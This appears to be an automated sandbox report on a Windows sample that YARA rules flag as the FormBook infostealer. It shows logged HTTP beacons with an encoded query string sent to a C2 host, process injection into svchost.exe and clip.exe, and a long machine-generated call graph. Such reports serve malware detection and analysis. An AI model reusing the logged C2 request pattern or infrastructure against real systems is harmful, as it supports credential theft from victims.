                                              X-Varnish: 1252451597
                                              Age: 0
                                              Via: 1.1 varnish
                                              Connection: close
                                              X-Varnish-Cache: MISS
                                              Server: C2M Server v1.02
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.64998254.67.87.110802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:37:03.051117897 CET514OUTGET /qj8y/?UL=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FqnxCzX9ML9xT9Z05e0CpTZrp7KXB+HgH/zGECw7Rot5BzIIB/yw=&tX=7fn4Kf88PV HTTP/1.1
                                              Host: www.ngmr.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Dec 5, 2024 18:37:04.275090933 CET550INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 282
                                              Accept-Ranges: bytes
                                              Date: Thu, 05 Dec 2024 18:00:25 GMT
                                              X-Varnish: 1252451599
                                              Age: 0
                                              Via: 1.1 varnish
                                              Connection: close
                                              X-Varnish-Cache: MISS
                                              Server: C2M Server v1.02
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:12:35:01
                                              Start date:05/12/2024
                                              Path:C:\Users\user\Desktop\MGQeZjDXc3.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\MGQeZjDXc3.exe"
                                              Imagebase:0xaa0000
                                              File size:1'217'024 bytes
                                              MD5 hash:7B5010E993F3043FBC100BE1C7984F85
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:12:35:03
                                              Start date:05/12/2024
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\MGQeZjDXc3.exe"
                                              Imagebase:0xfc0000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2558893613.0000000007FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2558893613.0000000007FF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2548261578.0000000004990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2548261578.0000000004990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:12:35:36
                                              Start date:05/12/2024
                                              Path:C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe"
                                              Imagebase:0x760000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3378789230.0000000003970000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3378789230.0000000003970000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:6
                                              Start time:12:35:38
                                              Start date:05/12/2024
                                              Path:C:\Windows\SysWOW64\clip.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\clip.exe"
                                              Imagebase:0x590000
                                              File size:24'576 bytes
                                              MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3377564607.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3377564607.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3377429665.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3377429665.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3377223232.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3377223232.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:7
                                              Start time:12:35:51
                                              Start date:05/12/2024
                                              Path:C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe"
                                              Imagebase:0x760000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:9
                                              Start time:12:36:03
                                              Start date:05/12/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff728280000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:4.1%
                                                Dynamic/Decrypted Code Coverage:0.4%
                                                Signature Coverage:10.6%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:153
                                                execution_graph 94111 ab221a 94112 ab271e 94111->94112 94113 ab2223 94111->94113 94121 ab1eba Mailbox 94112->94121 94122 ada58f 48 API calls ___crtGetEnvironmentStringsW 94112->94122 94113->94112 94114 aa936c 81 API calls 94113->94114 94115 ab224e 94114->94115 94115->94112 94116 ab225e 94115->94116 94119 aab384 48 API calls 94116->94119 94118 b1be8a 94120 aa6eed 48 API calls 94118->94120 94119->94121 94120->94121 94122->94118 94123 ac5dfd 94124 ac5e09 ___lock_fhandle 94123->94124 94160 ac7eeb GetStartupInfoW 94124->94160 94126 ac5e0e 94162 ac9ca7 GetProcessHeap 94126->94162 94128 ac5e66 94129 ac5e71 94128->94129 94247 ac5f4d 47 API calls 3 library calls 94128->94247 94163 ac7b47 94129->94163 94132 ac5e77 94133 ac5e82 __RTC_Initialize 94132->94133 94248 ac5f4d 47 API calls 3 library calls 94132->94248 94184 acacb3 94133->94184 94136 ac5e91 94137 ac5e9d GetCommandLineW 94136->94137 94249 ac5f4d 47 API calls 3 library calls 94136->94249 94203 ad2e7d GetEnvironmentStringsW 94137->94203 94140 ac5e9c 94140->94137 94144 ac5ec2 94216 ad2cb4 94144->94216 94147 ac5ec8 94148 ac5ed3 94147->94148 94251 ac115b 47 API calls 3 library calls 94147->94251 94230 ac1195 94148->94230 94151 ac5edb 94152 ac5ee6 __wwincmdln 94151->94152 94252 ac115b 47 API calls 3 library calls 94151->94252 94234 aa3a0f 94152->94234 94155 ac5efa 94156 ac5f09 94155->94156 94253 ac13f1 47 API calls _doexit 94155->94253 94254 ac1186 47 API calls _doexit 94156->94254 94159 ac5f0e ___lock_fhandle 94161 ac7f01 94160->94161 94161->94126 94162->94128 94255 ac123a 30 API calls 2 library calls 94163->94255 94165 ac7b4c 94256 ac7e23 InitializeCriticalSectionAndSpinCount 94165->94256 94167 ac7b51 94168 ac7b55 94167->94168 94258 ac7e6d TlsAlloc 94167->94258 94257 ac7bbd 50 API calls 2 library calls 94168->94257 94171 ac7b5a 94171->94132 94172 ac7b67 94172->94168 94173 ac7b72 94172->94173 94259 ac6986 94173->94259 94176 ac7bb4 94267 ac7bbd 50 API calls 2 library calls 94176->94267 94179 ac7b93 94179->94176 94181 ac7b99 94179->94181 94180 ac7bb9 94180->94132 94266 ac7a94 47 API calls 4 library calls 94181->94266 94183 ac7ba1 GetCurrentThreadId 94183->94132 94185 acacbf ___lock_fhandle 94184->94185 94276 ac7cf4 94185->94276 94187 acacc6 94188 ac6986 __calloc_crt 47 API calls 94187->94188 94189 acacd7 94188->94189 94190 acad42 GetStartupInfoW 94189->94190 94191 acace2 ___lock_fhandle @_EH4_CallFilterFunc@8 94189->94191 94198 acae80 94190->94198 94200 acad57 94190->94200 94191->94136 94192 acaf44 94283 acaf58 LeaveCriticalSection _doexit 94192->94283 94194 acaec9 GetStdHandle 94194->94198 94195 ac6986 __calloc_crt 47 API calls 94195->94200 94196 acaedb GetFileType 94196->94198 94197 acada5 94197->94198 94201 acade5 InitializeCriticalSectionAndSpinCount 94197->94201 94202 acadd7 GetFileType 94197->94202 94198->94192 94198->94194 94198->94196 94199 acaf08 InitializeCriticalSectionAndSpinCount 94198->94199 94199->94198 94200->94195 94200->94197 94200->94198 94201->94197 94202->94197 94202->94201 94204 ad2e8e 94203->94204 94205 ac5ead 94203->94205 94322 ac69d0 47 API calls __malloc_crt 94204->94322 94210 ad2a7b GetModuleFileNameW 94205->94210 94208 ad2eb4 ___crtGetEnvironmentStringsW 94209 ad2eca FreeEnvironmentStringsW 94208->94209 94209->94205 94211 ad2aaf _wparse_cmdline 94210->94211 94212 ac5eb7 94211->94212 94213 ad2ae9 94211->94213 94212->94144 94250 ac115b 47 API calls 3 library calls 94212->94250 94323 ac69d0 47 API calls __malloc_crt 94213->94323 94215 ad2aef _wparse_cmdline 94215->94212 94217 ad2ccd __NMSG_WRITE 94216->94217 94221 ad2cc5 94216->94221 94218 ac6986 __calloc_crt 47 API calls 94217->94218 94226 ad2cf6 __NMSG_WRITE 94218->94226 94219 ad2d4d 94220 ac1c9d _free 47 API calls 94219->94220 94220->94221 94221->94147 94222 ac6986 __calloc_crt 47 API calls 94222->94226 94223 ad2d72 94224 ac1c9d _free 47 API calls 94223->94224 94224->94221 94226->94219 94226->94221 94226->94222 94226->94223 94227 ad2d89 94226->94227 94324 ad2567 47 API calls __cftoe2_l 94226->94324 94325 ac6e20 IsProcessorFeaturePresent 94227->94325 94229 ad2d95 94229->94147 94231 ac11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94230->94231 94233 ac11e0 __IsNonwritableInCurrentImage 94231->94233 94348 ac0f0a 52 API calls __cinit 94231->94348 94233->94151 94235 aa3a29 94234->94235 94236 b11ebf 94234->94236 94237 aa3a63 IsThemeActive 94235->94237 94349 ac1405 94237->94349 94241 aa3a8f 94361 aa3adb SystemParametersInfoW SystemParametersInfoW 94241->94361 94243 aa3a9b 94362 aa3d19 94243->94362 94245 aa3aa3 SystemParametersInfoW 94246 aa3ac8 94245->94246 94246->94155 94247->94129 94248->94133 94249->94140 94253->94156 94254->94159 94255->94165 94256->94167 94257->94171 94258->94172 94262 ac698d 94259->94262 94261 ac69ca 94261->94176 94265 ac7ec9 TlsSetValue 94261->94265 94262->94261 94263 ac69ab Sleep 94262->94263 94268 ad30aa 94262->94268 94264 ac69c2 94263->94264 94264->94261 94264->94262 94265->94179 94266->94183 94267->94180 94269 ad30b5 94268->94269 94273 ad30d0 __calloc_impl 94268->94273 94270 ad30c1 94269->94270 94269->94273 94275 ac7c0e 47 API calls __getptd_noexit 94270->94275 94271 ad30e0 HeapAlloc 94271->94273 94274 ad30c6 94271->94274 94273->94271 94273->94274 94274->94262 94275->94274 94277 ac7d18 EnterCriticalSection 94276->94277 94278 ac7d05 94276->94278 94277->94187 94284 ac7d7c 94278->94284 94280 ac7d0b 94280->94277 94308 ac115b 47 API calls 3 library calls 94280->94308 94283->94191 94285 ac7d88 ___lock_fhandle 94284->94285 94286 ac7da9 94285->94286 94287 ac7d91 94285->94287 94292 ac7e11 ___lock_fhandle 94286->94292 94300 ac7da7 94286->94300 94309 ac81c2 47 API calls __NMSG_WRITE 94287->94309 94289 ac7d96 94310 ac821f 47 API calls 5 library calls 94289->94310 94292->94280 94293 ac7dbd 94295 ac7dc4 94293->94295 94296 ac7dd3 94293->94296 94294 ac7d9d 94311 ac1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94294->94311 94313 ac7c0e 47 API calls __getptd_noexit 94295->94313 94299 ac7cf4 __lock 46 API calls 94296->94299 94302 ac7dda 94299->94302 94300->94286 94312 ac69d0 47 API calls __malloc_crt 94300->94312 94301 ac7dc9 94301->94292 94303 ac7dfe 94302->94303 94304 ac7de9 InitializeCriticalSectionAndSpinCount 94302->94304 94314 ac1c9d 94303->94314 94305 ac7e04 94304->94305 94320 ac7e1a LeaveCriticalSection _doexit 94305->94320 94309->94289 94310->94294 94312->94293 94313->94301 94315 ac1ca6 RtlFreeHeap 94314->94315 94316 ac1ccf _free 94314->94316 94315->94316 94317 ac1cbb 94315->94317 94316->94305 94321 ac7c0e 47 API calls __getptd_noexit 94317->94321 94319 ac1cc1 GetLastError 94319->94316 94320->94292 94321->94319 94322->94208 94323->94215 94324->94226 94326 ac6e2b 94325->94326 94331 ac6cb5 94326->94331 94330 ac6e46 94330->94229 94332 ac6ccf _memset ___raise_securityfailure 94331->94332 94333 ac6cef IsDebuggerPresent 94332->94333 94339 ac81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94333->94339 94336 ac6db3 ___raise_securityfailure 94340 aca70c 94336->94340 94337 ac6dd6 94338 ac8197 GetCurrentProcess TerminateProcess 94337->94338 94338->94330 94339->94336 94341 aca714 94340->94341 94342 aca716 IsProcessorFeaturePresent 94340->94342 94341->94337 94344 ad37b0 94342->94344 94347 ad375f 5 API calls ___raise_securityfailure 94344->94347 94346 ad3893 94346->94337 94347->94346 94348->94233 94350 ac7cf4 __lock 47 API calls 94349->94350 94351 ac1410 94350->94351 94414 ac7e58 LeaveCriticalSection 94351->94414 94353 aa3a88 94354 ac146d 94353->94354 94355 ac1477 94354->94355 94356 ac1491 94354->94356 94355->94356 94415 ac7c0e 47 API calls __getptd_noexit 94355->94415 94356->94241 94358 ac1481 94416 ac6e10 8 API calls __cftoe2_l 94358->94416 94360 ac148c 94360->94241 94361->94243 94363 aa3d26 __ftell_nolock 94362->94363 94364 aad7f7 48 API calls 94363->94364 94365 aa3d31 GetCurrentDirectoryW 94364->94365 94417 aa61ca 94365->94417 94367 aa3d57 IsDebuggerPresent 94368 b11cc1 MessageBoxA 94367->94368 94369 aa3d65 94367->94369 94371 b11cd9 94368->94371 94369->94371 94372 aa3d82 94369->94372 94404 aa3e3a 94369->94404 94370 aa3e41 SetCurrentDirectoryW 94375 aa3e4e Mailbox 94370->94375 94592 abc682 48 API calls 94371->94592 94491 aa40e5 94372->94491 94375->94245 94376 b11ce9 94381 b11cff SetCurrentDirectoryW 94376->94381 94378 aa3da0 GetFullPathNameW 94379 aa6a63 48 API calls 94378->94379 94380 aa3ddb 94379->94380 94507 aa6430 94380->94507 94381->94375 94384 aa3df6 94385 aa3e00 94384->94385 94593 ae71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94384->94593 94523 aa3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94385->94523 94389 b11d1c 94389->94385 94391 b11d2d 94389->94391 94393 aa5374 50 API calls 94391->94393 94392 aa3e0a 94394 aa3e1f 94392->94394 94396 aa4ffc 67 API calls 94392->94396 94395 b11d35 94393->94395 94531 aae8d0 94394->94531 94398 aace19 48 API calls 94395->94398 94396->94394 94400 b11d42 94398->94400 94401 b11d49 94400->94401 94402 b11d6e 94400->94402 94405 aa518c 48 API calls 94401->94405 94406 aa518c 48 API calls 94402->94406 94404->94370 94407 b11d54 94405->94407 94408 b11d6a GetForegroundWindow ShellExecuteW 94406->94408 94409 aa510d 48 API calls 94407->94409 94411 b11d9e Mailbox 94408->94411 94412 b11d61 94409->94412 94411->94404 94413 aa518c 48 API calls 94412->94413 94413->94408 94414->94353 94415->94358 94416->94360 94594 abe99b 94417->94594 94421 aa61eb 94422 aa5374 50 API calls 94421->94422 94423 aa61ff 94422->94423 94424 aace19 48 API calls 94423->94424 94425 aa620c 94424->94425 94611 aa39db 94425->94611 94427 aa6216 Mailbox 94428 aa6eed 48 API calls 94427->94428 94429 aa622b 94428->94429 94623 aa9048 94429->94623 94432 aace19 48 API calls 94433 aa6244 94432->94433 94626 aad6e9 94433->94626 94435 aa6254 Mailbox 94436 aace19 48 API calls 94435->94436 94437 aa627c 94436->94437 94438 aad6e9 55 API calls 94437->94438 94439 aa628f Mailbox 94438->94439 94440 aace19 48 API calls 94439->94440 94441 aa62a0 94440->94441 94630 aad645 94441->94630 94443 aa62b2 Mailbox 94444 aad7f7 48 API calls 94443->94444 94445 aa62c5 94444->94445 94640 aa63fc 94445->94640 94449 aa62df 94450 aa62e9 94449->94450 94451 b11c08 94449->94451 94453 ac0fa7 _W_store_winword 59 API calls 94450->94453 94452 aa63fc 48 API calls 94451->94452 94454 b11c1c 94452->94454 94455 aa62f4 94453->94455 94457 aa63fc 48 API calls 94454->94457 94455->94454 94456 aa62fe 94455->94456 94458 ac0fa7 _W_store_winword 59 API calls 94456->94458 94459 b11c38 94457->94459 94460 aa6309 94458->94460 94462 aa5374 50 API calls 94459->94462 94460->94459 94461 aa6313 94460->94461 94463 ac0fa7 _W_store_winword 59 API calls 94461->94463 94465 b11c5d 94462->94465 94464 aa631e 94463->94464 94466 aa635f 94464->94466 94468 b11c86 94464->94468 94471 aa63fc 48 API calls 94464->94471 94467 aa63fc 48 API calls 94465->94467 94466->94468 94469 aa636c 94466->94469 94470 b11c69 94467->94470 94472 aa6eed 48 API calls 94468->94472 94656 abc050 94469->94656 94473 aa6eed 48 API calls 94470->94473 94474 aa6342 94471->94474 94475 b11ca8 94472->94475 94477 b11c77 94473->94477 94478 aa6eed 48 API calls 94474->94478 94479 aa63fc 48 API calls 94475->94479 94481 aa63fc 48 API calls 94477->94481 94482 aa6350 94478->94482 94483 b11cb5 94479->94483 94480 aa6384 94667 ab1b90 94480->94667 94481->94468 94485 aa63fc 48 API calls 94482->94485 94483->94483 94485->94466 94486 aa6394 94487 ab1b90 48 API calls 94486->94487 94489 aa63d6 Mailbox 94486->94489 94490 aa63fc 48 API calls 94486->94490 94683 aa6b68 48 API calls 94486->94683 94487->94486 94489->94367 94490->94486 94492 aa40f2 __ftell_nolock 94491->94492 94493 aa410b 94492->94493 94494 b1370e _memset 94492->94494 94495 aa660f 49 API calls 94493->94495 94496 b1372a GetOpenFileNameW 94494->94496 94497 aa4114 94495->94497 94498 b13779 94496->94498 95214 aa40a7 94497->95214 94500 aa6a63 48 API calls 94498->94500 94502 b1378e 94500->94502 94502->94502 94504 aa4129 95232 aa4139 94504->95232 94508 aa643d __ftell_nolock 94507->94508 95432 aa4c75 94508->95432 94510 aa6442 94521 aa3dee 94510->94521 95443 aa5928 94510->95443 94512 aa644f 94512->94521 95451 aa5798 94512->95451 94514 aa6458 94515 aa645c GetFullPathNameW 94514->94515 94514->94521 94516 aa6a63 48 API calls 94515->94516 94517 aa6488 94516->94517 94518 aa6a63 48 API calls 94517->94518 94519 aa6495 94518->94519 94520 aa6a63 48 API calls 94519->94520 94522 b15dcf _wcscat 94519->94522 94520->94521 94521->94376 94521->94384 94524 aa3ed8 94523->94524 94525 b11cba 94523->94525 95542 aa4024 94524->95542 94529 aa3e05 94530 aa36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94529->94530 94530->94392 94532 aae8f6 94531->94532 94590 aae906 Mailbox 94531->94590 94533 aaed52 94532->94533 94532->94590 95672 abe3cd 331 API calls 94533->95672 94535 aa3e2a 94535->94404 94591 aa3847 Shell_NotifyIconW _memset 94535->94591 94537 aaed63 94537->94535 94538 aaed70 94537->94538 95674 abe312 331 API calls Mailbox 94538->95674 94539 aae94c PeekMessageW 94539->94590 94541 b1526e Sleep 94541->94590 94542 aaed77 LockWindowUpdate DestroyWindow GetMessageW 94542->94535 94545 aaeda9 94542->94545 94543 aaebc7 94543->94535 95673 aa2ff6 16 API calls 94543->95673 94548 aaed21 PeekMessageW 94548->94590 94550 abf4ea 48 API calls 94550->94590 94551 aaebf7 timeGetTime 94551->94590 94553 aa6eed 48 API calls 94553->94590 94554 b15557 WaitForSingleObject 94558 b15574 GetExitCodeProcess CloseHandle 94554->94558 94554->94590 94555 aaed3a TranslateMessage DispatchMessageW 94555->94548 94556 aa2aae 307 API calls 94556->94590 94557 b1588f Sleep 94585 b15429 Mailbox 94557->94585 94558->94590 94559 aad7f7 48 API calls 94559->94585 94560 aaedae timeGetTime 94560->94590 94562 b15733 Sleep 94562->94585 94564 aa1caa 49 API calls 94564->94590 94565 abdc38 timeGetTime 94565->94585 94566 b15926 GetExitCodeProcess 94569 b15952 CloseHandle 94566->94569 94570 b1593c WaitForSingleObject 94566->94570 94568 b15445 Sleep 94568->94590 94569->94585 94570->94569 94570->94590 94571 b15432 Sleep 94571->94568 94572 b08c4b 108 API calls 94572->94585 94573 aa2c79 107 API calls 94573->94585 94575 b159ae Sleep 94575->94590 94578 aace19 48 API calls 94578->94585 94581 aad6e9 55 API calls 94581->94585 94585->94559 94585->94565 94585->94566 94585->94568 94585->94571 94585->94572 94585->94573 94585->94575 94585->94578 94585->94581 94585->94590 95676 ae4cbe 49 API calls Mailbox 94585->95676 95677 aa1caa 49 API calls 94585->95677 95678 aa2aae 331 API calls 94585->95678 95708 afccb2 50 API calls 94585->95708 95709 ae7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94585->95709 95710 ae6532 63 API calls 3 library calls 94585->95710 94586 aace19 48 API calls 94586->94590 94588 aad6e9 55 API calls 94588->94590 94589 aecc5c 86 API calls 94589->94590 94590->94539 94590->94541 94590->94543 94590->94548 94590->94550 94590->94551 94590->94553 94590->94554 94590->94555 94590->94556 94590->94557 94590->94560 94590->94562 94590->94564 94590->94568 94590->94585 94590->94586 94590->94588 94590->94589 95547 aaef00 94590->95547 95554 aaf110 94590->95554 95619 ab45e0 94590->95619 95635 ab3200 94590->95635 95661 abe244 94590->95661 95666 abdc5f 94590->95666 95671 aaeed0 331 API calls Mailbox 94590->95671 95675 b08d23 48 API calls 94590->95675 95679 aafe30 94590->95679 94591->94404 94592->94376 94593->94389 94595 aad7f7 48 API calls 94594->94595 94596 aa61db 94595->94596 94597 aa6009 94596->94597 94598 aa6016 __ftell_nolock 94597->94598 94599 aa6a63 48 API calls 94598->94599 94604 aa617c Mailbox 94598->94604 94601 aa6048 94599->94601 94609 aa607e Mailbox 94601->94609 94684 aa61a6 94601->94684 94602 aa61a6 48 API calls 94602->94609 94603 aa614f 94603->94604 94605 aace19 48 API calls 94603->94605 94604->94421 94607 aa6170 94605->94607 94606 aace19 48 API calls 94606->94609 94608 aa64cf 48 API calls 94607->94608 94608->94604 94609->94602 94609->94603 94609->94604 94609->94606 94610 aa64cf 48 API calls 94609->94610 94610->94609 94687 aa41a9 94611->94687 94614 aa3a06 94614->94427 94616 b12ff0 94619 ac1c9d _free 47 API calls 94616->94619 94620 b12ffd 94619->94620 94621 aa4252 84 API calls 94620->94621 94622 b13006 94621->94622 94622->94622 94624 abf4ea 48 API calls 94623->94624 94625 aa6237 94624->94625 94625->94432 94627 aad6f4 94626->94627 94628 aad71b 94627->94628 95200 aad764 55 API calls 94627->95200 94628->94435 94631 aad654 94630->94631 94638 aad67e 94630->94638 94632 aad65b 94631->94632 94634 aad6c2 94631->94634 94633 aad666 94632->94633 94639 aad6ab 94632->94639 95201 aad9a0 53 API calls __cinit 94633->95201 94634->94639 95203 abdce0 53 API calls 94634->95203 94638->94443 94639->94638 95202 abdce0 53 API calls 94639->95202 94641 aa641f 94640->94641 94642 aa6406 94640->94642 94644 aa6a63 48 API calls 94641->94644 94643 aa6eed 48 API calls 94642->94643 94645 aa62d1 94643->94645 94644->94645 94646 ac0fa7 94645->94646 94647 ac1028 94646->94647 